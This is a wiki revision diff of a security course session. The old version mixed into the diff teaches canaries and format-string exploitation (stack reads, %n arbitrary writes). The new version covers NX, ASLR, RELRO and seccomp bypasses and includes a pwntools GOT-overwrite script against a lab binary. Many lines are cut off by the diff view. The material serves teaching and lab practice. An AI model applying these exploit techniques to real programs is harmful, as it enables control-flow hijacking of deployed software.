This shows you the differences between two versions of the page.
Both sides previous revision Previous revision Next revision | Previous revision | ||
session:10 [2019/07/16 00:56] Radu-Nicolae NICOLAU (78289) |
session:10 [2020/07/19 12:49] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | = 0x0A: Information Leaks | + | ====== 0x09. Defense Mechanisms ====== |
- | == Slides | + | ===== Resources ===== |
- | == Resources | + | [[http:// |
- | [[https://security.cs.pub.ro/summer-school/res/ | + | Get the tasks by cloning |
- | [[https:// | ||
- | [[https:// | + | ===== Tutorials ===== |
+ | The previous sessions ([[: | ||
- | == Stack Protection (Canaries) | + | In [[: |
- | The name comes from canaries (birds) that were used by mining workers when entering mines and were affected by any deadly gases such as methane before humans were. In our case, stack canaries are used to check if a buffer overflow of a stack variable resulted in overriding | + | Next, we will introduce |
- | {{ : | + | Another defense mechanism we will discuss in **seccomp**, |
- | There are 3 main variations of this mechanism: //random//, // | + | Besides presenting these mechanisms, we are also going to take a quick look at how can we bypass them. Since these protections are ubiquitous at this time, you will have to work around them almost every time you build a binary exploit. |
- | **Random** canaries | + | <note warning> |
+ | The tasks today are designed for 32 bit executables. Make sure you compile with the '' | ||
+ | The binaries | ||
+ | </note> | ||
- | The **terminator** canaries contain string termination characters such as '' | + | ===== Tools ===== |
- | The **random XOR** canaries work by applying a XOR-based algorithm having both a random number (the canary), and the correct address as inputs. The attacker has to both obtain the random number, and apply the algorithm on the new return address before building the payload. | + | The **checksec** command-line tool is a wrapper over the functionality implemented in pwntools' |
- | <note> | + | We will use this tool throughout the session to identify which defense mechanisms are enabled for a certain binary: |
- | **crt0.o** is a set of initialization routines linked into compiled C programs, and executed before calling '' | + | <code bash> |
+ | root@kali: | ||
+ | [*] '/root/demo/nx/no_nx' | ||
+ | Arch: | ||
+ | RELRO: | ||
+ | Stack: | ||
+ | NX: NX disabled | ||
+ | PIE: PIE enabled | ||
+ | RWX: Has RWX segments | ||
+ | </ | ||
+ | |||
+ | <note warning> To get it to work in the Kali VM, you have to update pwntools to the latest version using: | ||
+ | < | ||
+ | $ pip install -U pwntools | ||
+ | </ | ||
</ | </ | ||
- | The 3 well known implementations of stack protections are: StackGuard, ProPolice, and StackShield. | ||
- | === StackGuard | + | ==== Executable Space Protection ==== |
- | The [[https:// | + | The **executable space protection** is an instance of the **principle of least privilege**, which is applied |
- | <note important> | + | The mechanism can be (and was) implemented in many different ways, the most common in Linux being: |
- | [[http:// | + | |
- | </ | + | |
- | === StackShield | + | **NX bit:** This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is current implementation in 64-bit processors where page table entries are 8-bytes wide. |
- | The most notable feature of StackShield, | + | **Physical Address Extension (PAE):** Besides |
- | === ProPolice | + | **Emulation: |
- | ProPolice, proposed by IBM, started from an implementation similar | + | < |
+ | This security feature gets in the way of **just-in-time (JIT)** compilers, which need to produce and write code at runtime, and that is later executed. Since a JIT compiler cannot run in this kind of secured environment, | ||
- | {{ :session:propolice_stack.jpg?nolink&400 |}} | + | * Slides: [[http://www.semantiscope.com/ |
+ | * Paper: [[http:// | ||
- | < | ||
- | GCC supports 3 levels of stack smashing protection: complete, normal, and strong. The difference lies in the types of function that are protected, with the decision being made by looking at what kinds of local variables are used. Details in [[http:// | ||
</ | </ | ||
- | Let's compile a small application with GCC's stack protection. | + | There are of course other implementations in different hardening-oriented projects such as: OpenBSD [[http:// |
- | <file c ssp.c> | + | === Walk-through === |
- | void func() { | + | |
- | char buffer[1337]; | + | |
- | return; | + | |
- | } | + | |
- | int main() { | + | The Linux kernel provides support for managing memory protections in the '' |
- | func(); | + | |
- | return 0; | + | |
- | } | + | |
- | </ | + | |
- | Compile | + | <note important> |
+ | PaX has a protection option that restricts | ||
+ | </ | ||
+ | |||
+ | Let's start by deactivating ASLR, which is going to be discussed in the following section of this tutorial, and only focus on the NX protection. We can do this in two ways, as told below: | ||
+ | |||
+ | To disable ASLR system-wide we use (root access is required): | ||
<code bash> | <code bash> | ||
- | ~$ CFLAGS='-O0 -m32 -fstack-protector' | + | ~$ sudo bash -c 'echo 0 > / |
</ | </ | ||
- | The disassembled code for '' | + | To create a shell with ASLR disabled (ASLR will also be disabled |
<code bash> | <code bash> | ||
- | ~$ objdump | + | ~$ setarch $(uname |
</ | </ | ||
- | <code objdump> | + | Let's first compile an extremely simple C application: |
- | 0804841b < | + | |
- | 804841b: | + | <code c> |
- | 804841c: 89 e5 mov ebp,esp | + | int main() { |
- | | + | while (1); |
- | | + | } |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | 804843c: e8 af fe ff ff | + | |
- | 8048441: | + | |
- | 8048442: | + | |
</ | </ | ||
- | We can observe the random value being read from '' | + | <code bash> |
+ | ~$ CFLAGS='-m32 -O0' | ||
+ | </ | ||
- | <file text canary.gdb> | + | As presented in [[session: |
- | set disassembly-flavor intel | + | |
- | file ssp | + | |
- | break *0x804842a | + | |
- | commands | + | |
- | p/x $eax | + | |
- | c | + | |
- | end | + | |
- | run | + | |
- | quit | + | |
- | </ | + | |
- | Run using: | + | < |
+ | Program Headers: | ||
+ | Type | ||
+ | PHDR | ||
+ | INTERP | ||
+ | [Requesting program interpreter: | ||
+ | LOAD | ||
+ | LOAD | ||
+ | DYNAMIC | ||
+ | NOTE | ||
+ | GNU_EH_FRAME | ||
+ | GNU_STACK | ||
+ | GNU_RELRO | ||
- | <code bash> | + | |
- | ~$ gdb -x canary.gdb ssp | + | |
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
</ | </ | ||
- | === Defeating Canaries | ||
- | This [[http:// | + | Check the '' |
- | For example, the attacker might target: | + | Next we are interested in seeing calls to '' |
- | * parameters function pointers | + | |
- | * the return address | + | |
- | * the old base pointer | + | |
- | * a plain function pointer | + | |
- | Buffers could be stored either on the stack, the heap or '' | + | <code bash> |
+ | ~$ strace -e mmap2,mprotect / | ||
+ | </ | ||
+ | |||
+ | <code text> | ||
+ | [ Process PID=11198 runs in 32 bit mode. ] | ||
+ | mmap2(0x8048000, | ||
+ | mmap2(0x8049000, | ||
+ | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, | ||
+ | mmap2(NULL, 8192, PROT_READ|PROT_WRITE, | ||
+ | mmap2(NULL, 156324, PROT_READ, MAP_PRIVATE, | ||
+ | mmap2(NULL, 1763964, PROT_READ|PROT_EXEC, | ||
+ | mmap2(0xf7fcd000, | ||
+ | mmap2(0xf7fd0000, | ||
+ | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, | ||
+ | mprotect(0xf7fcd000, | ||
+ | mprotect(0x8049000, | ||
+ | mprotect(0x56575000, | ||
+ | </ | ||
+ | |||
+ | We can observe a '' | ||
<note important> | <note important> | ||
- | Note that attacks can also be carried out via indirect pointers. The attacker could target | + | Note that the **stack** is not explicitly allocated by the loader. The kernel will keep increasing it each time a page fault is triggered |
</ | </ | ||
- | Besides indirect attacks, stack canaries | + | We can dump all memory mappings of the still running process as follows: |
+ | <code bash> | ||
+ | ~$ ps u | grep / | ||
+ | ... | ||
+ | ~$ cat / | ||
+ | </ | ||
- | == Format String Exploits | + | < |
- | + | Make sure to use the PID of the loader process, and not the '' | |
- | < | + | |
- | In the following, '' | + | |
- | This formality arises from this paper on [[https:// | + | |
</ | </ | ||
- | The scenario that enables format string vulnerabilities is the direct use of unsanitized user provided input as a parameter to functions that can perform special operations based on that input. | + | <code bash> |
- | Eg. | + | ~$ cat / |
+ | </ | ||
- | < | + | < |
- | void print_something(char* user_input) | + | 08048000-08049000 r-xp 00000000 00:22 5769082 |
- | { | + | 08049000-0804a000 r--p 00000000 00:22 5769082 |
- | | + | 0804a000-0804b000 rw-p 00001000 00:22 5769082 |
- | } | + | 56555000-56575000 r-xp 00000000 08:05 827365 |
+ | 56575000-56576000 r--p 0001f000 08:05 827365 | ||
+ | 56576000-56577000 rw-p 00020000 08:05 827365 | ||
+ | f7e23000-f7e24000 rw-p 00000000 00:00 0 | ||
+ | f7e24000-f7fcd000 r-xp 00000000 08:05 823395 | ||
+ | f7fcd000-f7fcf000 r--p 001a9000 08:05 823395 | ||
+ | f7fcf000-f7fd0000 rw-p 001ab000 08:05 823395 | ||
+ | f7fd0000-f7fd3000 rw-p 00000000 00:00 0 | ||
+ | f7ffa000-f7ffd000 rw-p 00000000 00:00 0 | ||
+ | f7ffd000-f7ffe000 r-xp 00000000 00:00 0 [vdso] | ||
+ | fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] | ||
</ | </ | ||
- | vs. | + | === Bypassing NX === |
- | <code C> | + | **ret-to-plt/libc.** You can return to the '' |
- | void print_something(char* user_input) | + | |
- | { | + | |
- | printf(" | + | |
- | } | + | |
- | </code> | + | |
- | === Format functions | + | |
- | A number of format functions are defined in the ANSI C definition. There are some basic format string | + | |
- | Real family members: | + | |
- | * fprintf — prints to a FILE stream | + | |
- | * printf — prints to the ‘stdout’ stream | + | |
- | * sprintf — prints into a string | + | |
- | * snprintf — prints into a string with length checking | + | |
- | * vfprintf — print to a FILE stream from a va_arg structure | + | |
- | * vprintf — prints to ‘stdout’ from a va_arg structure | + | |
- | * vsprintf — prints to a string from a va_arg structure | + | |
- | * vsnprintf — prints to a string with length checking from a va_arg structure | + | |
- | ===== Relatives: | + | **mprotect().** If the application is using '' |
- | * setproctitle — set argv[] | + | |
- | * syslog — output to the syslog facility | + | |
- | * others like err*, verr*, warn*, vwarn* | + | |
- | === Use of format functions === | + | **Return Oriented Programming (ROP).** This is a generalization of the ret-to-* approach that makes use of existing |
- | To understand where this vulnerability | + | |
- | == Functionality | + | ==== Address Space Layout Randomization ==== |
- | * used to convert simple C datatypes to a string representation | + | |
- | * allow to specify the format of the representation | + | |
- | * process the resulting string (output to stderr, stdout, syslog, ...) | + | |
- | == How the format function works == | + | Address Space Layout Randomization (ASLR) is a security feature that maps different memory regions |
- | * the format string controls the behaviour | + | |
- | * it specifies the type of parameters | + | |
- | * parameters are saved on the stack (pushed) | + | |
- | * saved either directly (by value), or indirectly | + | |
- | == The calling function == | + | <note important> |
- | * has to know how many parameters it pushes to the stack, since it has to do the stack correction, when the format function returns | + | Linux allows 3 options for its ASLR implementation that can be configured using the ''/ |
+ | * **0**: deactivated | ||
+ | * **1**: random | ||
+ | * **2**: random heap too | ||
- | === What exactly is a format string === | + | </note> |
- | A format string is an ASCIIZ string that contains text and format parameters. | + | |
- | Example: | + | |
- | <code C> | + | |
- | printf ("The magic number is: %d\n", 1911); | + | |
- | </ | + | |
- | The text to be printed is "The magic number is:", followed by a format parameter (" | + | |
- | < | + | |
- | Some format parameters: | + | Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below. |
- | ^ Parameter | + | If you disabled ASLR system-wide, re-enable it using (root access is required): |
- | | %d | decimal(int) | + | |
- | | %u | unsigned decimal (unsigned int) | value | | + | |
- | | %x | hexadecimal (unsigned int) | value | | + | |
- | | %s | string ( char *) | reference | + | |
- | | %n | number of bytes written so far, (* int) | reference | + | |
- | The ' | + | < |
- | Example: | + | ~$ sudo bash -c 'echo 2 > / |
- | < | + | |
- | printf ("The magic number is: \x25d\n", | + | |
</ | </ | ||
- | The code above works, because ' | ||
- | === The stack and its role at format strings | + | If you disabled ASLR at shell level, simply **close |
- | The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack. | + | |
- | <code C> | + | |
- | printf (" | + | |
- | </ | + | |
- | From within | + | We can easily demonstrate |
- | {{ : | + | |
- | The format function now parses the format string ' | + | In GDB, ASLR is disabled |
- | should be evaluated. The string " | + | |
- | === What do we control? | + | < |
- | Through supplying the format string we are able to control the behaviour of the format function. We now have to examine what exactly we are able to control, and how to use this control to extend this partial control over | + | gdb-peda$ set disable-randomization off |
- | the process to full control of the execution flow. | + | |
- | === Crash of the program | + | |
- | By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like: | + | |
- | <code C> | + | |
- | printf (" | + | |
- | </ | + | |
- | Because ' | + | |
- | implementations offer the ' | + | |
- | === Viewing the stack | + | |
- | We can show some parts of the stack memory by using a format string like this: | + | |
- | < | + | |
- | printf (" | + | |
</ | </ | ||
- | This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like: | ||
- | < | ||
- | 40012980.080628c4.bffff7a4.00000005.08059c04 | ||
- | </ | ||
- | This is a partial dump of the stack memory, starting from the current bottom of the stack towards the top — assuming the stack grows towards the low addresses. Depending on the size of the format string buffer and the size of the output buffer, you can reconstruct more or less large parts of the stack memory by using this technique. In some cases you can even retrieve the entire stack memory. | ||
- | A stack dump gives important information about the program flow and local function variables and may be very helpful for finding the correct offsets for a successful exploitation. | ||
- | === Viewing memory at any location | ||
- | It is also possible to peek at memory locations different from the stack memory. To do this we have to get the format function to display memory from an address we can supply. | ||
- | This poses two problems to us: | ||
- | * First, we have to find a format parameter which uses an address (by reference) as stack parameter and displays memory from there | ||
- | * Secondly, we have to supply that address. | ||
- | We are lucky in the first case, since the ' | ||
- | So the remaining problem is, how to get that address on the stack, into the right place. | ||
+ | ==== Bypassing ASLR ==== | ||
- | Our format string is usually located on the stack itself, so we already have near to full control over the space where the format string lies. | + | **Bruteforce.** If you are able to inject payloads multiple times without crashing the application, you can bruteforce the address |
- | The format function internally maintains a pointer to the stack location of the current format parameter. | + | Another thing to keep in mind is that, as addresses are randomized |
- | If we would be able to get this pointer pointing into a memory space we can control, we can supply an address | + | |
- | <note important> | + | |
- | For re-creating the following attack you should place the string passed to '' | + | |
- | </ | + | |
- | To modify the stack pointer we can simply use dummy parameters that will ' | + | |
- | <code C> | + | |
- | printf (" | + | |
- | </ | + | |
- | The ' | + | |
- | After more or less of this increasing parameters the stack pointer points into our memory: the format string itself. | + | |
- | The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it lies above the current stack pointer for sure. | + | |
- | If we choose | + | |
- | In our case the address is illegal and would be ' | + | Take the following scenario: we interact |
- | Example: | + | |
- | <code> | + | **NOP sled.** In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and eventually reaching the exploit |
- | address | + | |
- | address (encoded as 32 bit le string): " | + | |
- | </ | + | |
- | <code C> | + | **jmp esp.** This will basically jump into the stack, no matter where it is mapped. It's actually a very rudimentary form of Return Oriented Programming which was discussed in the previous session. |
- | printf (" | + | |
+ | **Restrict entropy.** There are various ways of reducing the entropy of the randomized address. For example, you can decrease the initial stack size by setting a huge amount of dummy environment variables. | ||
+ | |||
+ | **Partial overwrite.** This technique is useful when we are able to overwrite only the least significant byte(s) of an address (e.g. a GOT entry). We must take into account the offsets of the original and final addresses from the beginning of the mapping. If these offsets only differ in the last 8 bits, the exploit is deterministic, | ||
+ | <code bash> | ||
+ | gdb-peda$ p read | ||
+ | $1 = {<text variable, no debug info>} 0xe6dd0 < | ||
+ | gdb-peda$ p write | ||
+ | $2 = {<text variable, no debug info>} 0xe6ea0 < | ||
</ | </ | ||
+ | However, since bits 12-16 of the offsets differ, the corresponding bits in the full addresses would have to be bruteforced (probability 1/4). | ||
+ | |||
+ | **Information leak.** The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes randomized address, or at least parts of them. You can also dump parts of libraries (e.g., '' | ||
+ | |||
+ | ==== Tutorial: Chaining Information Leaks with GOT Overwrite ==== | ||
+ | |||
+ | In this tutorial we will exploit a program that is similar to '' | ||
+ | <code c> | ||
+ | #include < | ||
+ | #include < | ||
+ | |||
+ | int main() { | ||
+ | int *addr; | ||
+ | |||
+ | printf(" | ||
+ | |||
+ | printf(" | ||
+ | scanf(" | ||
- | This will dump memory from 0x08480110 until a NULL byte is reached. By increasing the memory address dynamically we can map out the entire process space. | + | printf(" |
- | It is even possible to create a coredump like image of the remote process and to reconstruct a binary from it. It is also helpful to find the cause of unsuccessful exploitation attempts. | + | scanf(" |
- | If we cannot reach the exact format string boundary by using 4-Byte pops (' | + | sleep(10); |
- | This is analog to the alignment in buffer overflow exploits. | + | |
- | === Exploitation - through pure format strings | + | printf(" |
- | Our goal in the case of exploitation is to be able to control the instruction pointer, i.e we want to extend our very limited control — the ability to control the behaviour of the format function — to real execution control, that is executing our raw machine code. | + | |
- | Let's take a look at the following code: | + | |
- | <code C> | + | |
- | { | + | |
- | char buffer[512]; | + | |
- | snprintf (buffer, sizeof (buffer), user); | + | |
- | buffer[sizeof (buffer) - 1] = ’\0’; | + | |
} | } | ||
</ | </ | ||
- | In the code above it is not possible to enlarge our buffer by inserting some kind of ' | ||
- | At first it may look as if we cannot do much useful things, except crashing the program and inspecting some memory. | ||
- | Lets remember the format parameters mentioned. There is the '%n' | + | The goal is to alter the execution flow and avoid reaching |
- | The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. | + | |
- | Example: | + | Whenever we operate with addresses belonging |
- | < | + | < |
- | int i; | + | silvia@imladris:/ |
- | printf | + | |
- | printf | + | libc.so.6 => / |
+ | / | ||
+ | silvia@imladris:/ | ||
+ | / | ||
+ | silvia@imladris:/ | ||
+ | GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27. | ||
</ | </ | ||
- | Would print "i = 6". With the same method | + | |
+ | Alternatively, | ||
+ | |||
+ | For example, we have the following pair of addresses: | ||
< | < | ||
- | " | + | 0xf7df6250 < |
+ | 0xf7e780e0 < | ||
</ | </ | ||
+ | We enter them in the [[https:// | ||
- | With the '%08x' | + | For this '' |
- | We do this until this pointer points to the beginning of our format string | + | <code bash> |
- | The ' | + | silvia@imladris:/ |
- | But if we supply a correct mapped and writeable address this works and we overwrite four bytes (sizeof (int)) at the address: | + | (gdb) p printf |
- | <code> | + | $1 = {<text variable, no debug info>} 0x513a0 < |
- | " | + | (gdb) p exit |
+ | $2 = {<text variable, no debug info>} 0x30420 < | ||
</ | </ | ||
- | The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. | + | We will also need the address |
- | We have reached one of our goals: we can write to arbitrary addresses. But we cannot control the number we are writing yet — but this will change. | + | <code bash> |
+ | silvia@imladris:/sss/demo$ objdump -d -M intel -j .plt ./ | ||
+ | 080483b0 < | ||
+ | | ||
+ | </ | ||
- | The number we are writing — the count of characters written by the format function — is dependant | + | We start the program and compute the address |
- | Since we control the format string, we can at least take influence on this counter, by writing more or less bytes: | + | < |
- | < | + | >>> |
- | int a; | + | >>> |
- | printf (" | + | >>> |
- | /* a == 10 */ | + | 4158497824 |
- | int a; | + | </code> |
- | printf (" | + | < |
- | /* a == 150 */ | + | silvia@imladris: |
+ | Here' | ||
+ | Give me and address to modify! | ||
+ | 0x804a00c | ||
+ | Give me a value! | ||
+ | 4158497824 | ||
+ | silvia@imladris: | ||
+ | 10 | ||
</ | </ | ||
- | By using a dummy parameter ' | ||
- | But for writing large numbers — such as addresses — this is not sufficient, so we have to find a way to write arbitrary data. | ||
- | An integer number on the x86 architecture is stored in four bytes, which are little-endian ordered, | + | As we intended, |
- | So a number like 0x0000014c is stored in memory as: " | + | |
- | For the counter in the format function we can control the least significant byte, the first byte stored in memory by using dummy ' | + | The following pwntools script automates this interaction: |
- | Example: | + | < |
- | < | + | from pwn import |
- | unsigned char foo[4]; | + | |
- | printf (" | + | |
- | </ | + | |
- | When the printf function returns, foo[0] contains | + | p = process('./ |
+ | libc = ELF('/ | ||
- | But for an address, there are four bytes that we have to control completely. If we are unable to write four bytes at once, we can try to write a byte a time for four times in a row. | + | sleep_got = p.elf.got[' |
- | On most CISC architectures it is possible to write to unaligned arbitrary addresses. This can be used to write to the second least significant byte of the memory, where the address is stored. | + | |
- | This would look as follows: | + | |
- | <code C> | + | |
- | unsigned char canary[5]; | + | |
- | unsigned char foo[4]; | + | |
- | memset (foo, 0, sizeof (foo)); | + | |
- | /* 0 * before */ strcpy (canary, " | + | |
- | /* 1 */ printf (" | + | |
- | /* 2 */ printf (" | + | |
- | /* 3 */ printf (" | + | |
- | /* 4 */ printf (" | + | |
- | /* 5 * after */ printf (" | + | |
- | foo[2], foo[3]); | + | |
- | printf (" | + | |
- | canary[1], canary[2], canary[3]); | + | |
- | </ | + | |
- | This returns the output " | + | |
- | By increasing the pointer each time, the least significant byte moves through the memory we want to write to, and allows us to store completely arbitrary data. | + | |
- | As you can see in the first row of the following figure, all eight bytes are not touched yet by our overwrite code. | + | |
- | From the second row on we trigger four overwrites, shifted by one byte to the right for every step. | + | |
- | The last row shows the final desired state: we overwrote all four bytes of our foo array, but while doing so, we destroyed three bytes of the canary array. | + | |
- | We included the canary array just to see that we are overwriting memory we do not want to. | + | |
- | {{ : | + | |
- | Although this method looks complex, it can be used to overwrite arbitrary data at arbitrary addresses. | + | |
- | For explanation we have only used one write per format string until now, but it is also possible to write multiple times within one format string: | + | |
- | <code C> | + | |
- | strcpy (canary, " | + | |
- | printf (" | + | |
- | 1, (int *) & | + | |
- | 1, (int *) & | + | |
- | printf (" | + | |
- | foo[2], foo[3]); | + | |
- | printf (" | + | |
- | canary[1], canary[2], canary[3]); | + | |
- | </ | + | |
- | We use the '1' | + | p.recvuntil('libc address:') |
- | So we only have to add 16 characters instead of 32 to it, to get the results we desire. | + | libc_leak = int(p.recvuntil('\n')[:-1], 16) |
- | This was a special case, in which all the bytes increased throughout the writes. But we could also write '' | + | libc_base = libc_leak - libc.symbols['printf'] |
- | Since we write integer numbers and the order is little endian, only the least significant byte is important in the writes. | + | print(" |
- | By using counters of 0x80, 0x140, 0x220 and 0x310 characters respectivly when “%n” is triggered, we can construct the desired string. | + | |
- | The code to calculate the desired numberof-written-chars counter is this: | + | |
- | <code C> | + | |
- | write_byte += 0x100; | + | |
- | already_written | + | |
- | padding = (write_byte - already_written) | + | |
- | if (padding < 10) | + | |
- | padding += 0x100; | + | |
- | </ | + | |
- | Where 'write_byte' | + | exit = libc_base + libc.symbols['exit'] |
- | Example: | + | |
- | <code C> | + | |
- | write_byte = 0x7f; | + | |
- | already_written = 30; | + | |
- | write_byte += 0x100; /* write_byte is 0x17f now */ | + | |
- | already_written %= 0x100; /* already_written is 30 */ | + | |
- | /* afterwards padding is 97 (= 0x61) */ | + | p.sendline(hex(sleep_got)) |
- | padding = (write_byte - already_written) % 0x100; | + | |
- | if (padding < 10) | + | |
- | padding += 0x100; | + | |
- | </ | + | |
- | Now a format string of “%97u” would increase the ' | + | p.recvuntil('value!') |
- | The final check if the padding is below ten deserves some attention. A simple integer output, such as " | + | p.sendline(str(exit)) |
- | If the required length is larger than the padding we specify, say we want to output | + | |
- | By ensuring our padding is always larger than 10, we can keep an always accurate number of ‘already_written’, | + | |
- | === A general method to exploit format strings vulnerabilities | + | p.interactive() |
- | The only remaining thing to exploit such vulnerabilities in a hands-on practical way is to put the arguments into the right order on the stack and use a stackpop sequence to increase the stack pointer. | + | |
- | It should look like: | + | |
- | < | + | |
- | < | + | |
</ | </ | ||
- | Where: | ||
- | * **stackpop** The sequence of stack popping parameters that increase the stack pointer. Once the stackpop has been processed, the format function internal stack pointer points to the beginning of the dummy-addr-pair strings. | ||
- | * **dummy-addr-pair** Four pairs of dummy integer values and addresses to write to. The addresses are increasing by one with each pair, the dummy integer value can be anything that does not contain NULL bytes. | ||
- | * **write-code** The part of the format string that actually does the writing to the memory, by using ' | ||
- | The write code has to be modified to match the number of bytes written by the stackpop, since the stackpop wrote already characters to the output when the format function parses the write-code — the format function counter does not start at zero, and this has to be considered. | + | ==== RELRO ==== |
- | === Direct Parameter Access | + | |
- | There is a huge simplification which is known as ' | + | |
- | method to format string exploitation. | + | |
- | The direct parameter access is controlled by the ' | + | |
- | <code C> | + | |
- | printf (" | + | |
- | </ | + | |
- | Prints ' | + | **RELRO** (**Rel**ocation **R**ead-**O**nly) defends against attacks which overwrite data in relocation sections, such as the GOT-overwrite we showed earlier. |
- | <code C> | + | It comes in two flavors: partial and full. Partial RELRO protects the '' |
- | char foo[4]; | + | |
- | printf (" | + | |
- | " | + | |
- | " | + | |
- | " | + | |
- | 1, | + | |
- | | + | |
- | (int *) & | + | |
- | </ | + | |
+ | In the last session we explained how the addresses of dynamically linked functions are resolved using lazy binding. When Full RELRO is in effect, the addresses are resolved at load-time and then marked as read-only. Due to the way address space protection works, this means that the .got resides in the read-only mapping, instead | ||
+ | of the read-write mapping that contains the '' | ||
- | === Generalizing format string exploits | + | This is not a game-over in terms of exploitation, as other overwriteable code pointers often exist. These can be specific to the application we want to exploit or reside in shared libraries (for example: the GOT of shared libraries that are not compiled with RELRO). The return addresses on the stack are still viable targets. |
- | The '' | + | |
- | In general, any system where user input affects program execution and data access in a custom way can be susceptible to such a vulnerability. Other specialized examples | + | |
- | * SQL injections | + | |
- | * XSS injections | + | |
- | == Tasks | + | |
- | === Stack Canaries | + | ==== seccomp ==== |
- | Download | + | **seccomp** is a mechanism though which an application may transition into a state where the system calls it performs are restricted. The policy, which may act on a whitelist or blacklist model, is described using [[https:// |
- | ==== Task 1 | + | seccomp filters are instated using the '' |
- | The '' | + | This may severely limit our exploitation prospects in some cases. In the challenges that we have solved during these sessions, a common goal was spawning a shell and retrieving a certain file (the flag). If the exploited binary used a seccomp filter that disallowed the '' |
- | ==== Task 2 | + | The [[https:// |
+ | <code bash> | ||
+ | silvia@imladris:/ | ||
+ | | ||
+ | ================================= | ||
+ | 0000: 0x20 0x00 0x00 0x00000004 | ||
+ | 0001: 0x15 0x00 0x09 0x40000003 | ||
+ | 0002: 0x20 0x00 0x00 0x00000000 | ||
+ | 0003: 0x15 0x07 0x00 0x000000ad | ||
+ | 0004: 0x15 0x06 0x00 0x00000077 | ||
+ | 0005: 0x15 0x05 0x00 0x000000fc | ||
+ | 0006: 0x15 0x04 0x00 0x00000001 | ||
+ | 0007: 0x15 0x03 0x00 0x00000005 | ||
+ | 0008: 0x15 0x02 0x00 0x00000003 | ||
+ | 0009: 0x15 0x01 0x00 0x00000004 | ||
+ | 0010: 0x06 0x00 0x00 0x00050026 | ||
+ | 0011: 0x06 0x00 0x00 0x7fff0000 | ||
+ | </ | ||
- | The '' | + | In the example above we see a filter operating on the whitelist model: it specifies a subset of syscalls that are allowed: |
- | < | + | < |
- | You need to use the 32 bit VM to solve the second part of this task. | + | To install seccomp-tools on the Kali VM, use the the gem package manager: |
+ | < | ||
+ | $ gem install seccomp-tools | ||
+ | </ | ||
</ | </ | ||
- | <note warning> | + | ===== Challenges ===== |
- | '' | + | |
- | </ | + | |
- | <note tip>In case you need some help on these, please take a look at the {{: | + | ==== 01-04. Challenges - rwslotmachine[1-4] ==== |
+ | All of the challenges in this section are intended to be solved with **ASLR enabled**. However, you are free to disable it while developing your exploit for debugging purposes. You are provided with the needed shared libraries from the remote system. | ||
+ | |||
+ | The challenges are based on the same //" | ||
+ | |||
+ | They are numbered in the suggested solving order. | ||
- | === Task 3 - Format Strings | ||
- | Download the archive with the tasks at the top of the page containing 5 binaries exhibiting a format string vulnerability. Analyze what each binary does using the methods already familiar to you and try to determine the exact format string that will lead to the desired result. | ||
<note important> | <note important> | ||
- | The difficulty of the task associated with each binary increases with the number | + | In the case of '' |
</ | </ | ||
- | < | + | |
- | shows you the invalid address associated with a SIGSEGV signal. | + | < |
+ | To set LD_LIBRARY_PATH from a pwntools script, use this method: | ||
+ | <code python> | ||
+ | p = process(' | ||
+ | </ | ||
</ | </ | ||
+ | |||
<note tip> | <note tip> | ||
- | In case you get stuck, please have a look at the {{: | + | //Hint//: Do not waste time on reverse engineering '' |
</ | </ | ||
- | == References | ||
- | * [[http:// | ||
- | === Feedback | ||
- | Your feedback is very much needed and appreciated [[https:// | ||
+ | ==== 05. Bonus - rwslotmachine5 ==== | ||
+ | |||
+ | This challenge is similar to '' | ||
+ | |||
+ | <note tip> | ||
+ | You can find a table describing x86 syscalls [[http:// | ||
+ | </ |